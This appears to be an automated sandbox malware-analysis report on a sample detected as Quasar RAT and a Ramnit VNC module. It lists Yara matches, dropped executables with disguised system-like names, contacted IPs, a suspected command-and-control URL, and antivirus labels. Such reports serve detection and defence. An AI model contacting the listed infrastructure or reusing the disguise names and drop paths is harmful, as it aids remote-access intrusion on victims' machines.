Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Yara detected Ramnit VNC Module

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.008
Source: vnc.exe	String found in binary or memory: RFB 003.008
Source: vnc.exe, 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	String found in binary or memory: RFB 003.008
Source: svchost.exe	String found in binary or memory: RFB 003.008
Source: svchost.exe	String found in binary or memory: RFB 003.008
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	String found in binary or memory: RFB 003.008
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.008

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
5.8.88.191	unknown	Russian Federation	56541	KOMETA-ASRU	false
50.17.5.224	0x21.in	United States	14618	AMAZON-AESUS	false

Contacted Domains

Name	IP	Active
0x21.in	50.17.5.224	true
ip-api.com	208.95.112.1	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://0x21.in:8000/_az/	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false		high

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Avira: detection malicious, Label: TR/Spy.Agent.zgvfh
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Avira: detection malicious, Label: TR/AutoIt.tyemd
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Avira: detection malicious, Label: TR/Hijacker.W

Yara detected Quasar RAT

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Multi AV Scanner detection for submitted file

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%	Perma Link
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%	Perma Link
Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Antivirus / Scanner detection for submitted sample

Source: CVbJSUXraQ.exe	Avira: detected
Source: CVbJSUXraQ.exe	Avira: detected

Multi AV Scanner detection for domain / URL

Source: http://0x21.in:8000/_az/

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Virustotal: Detection: 83%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Virustotal: Detection: 85%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\windef.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	ReversingLabs: Detection: 93%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.0.vnc.exe.ab0000.0.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack	Avira: Label: TR/Hijacker.W
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.2.vnc.exe.ab0000.0.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack	Avira: Label: TR/AD.MoksSteal.elw
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
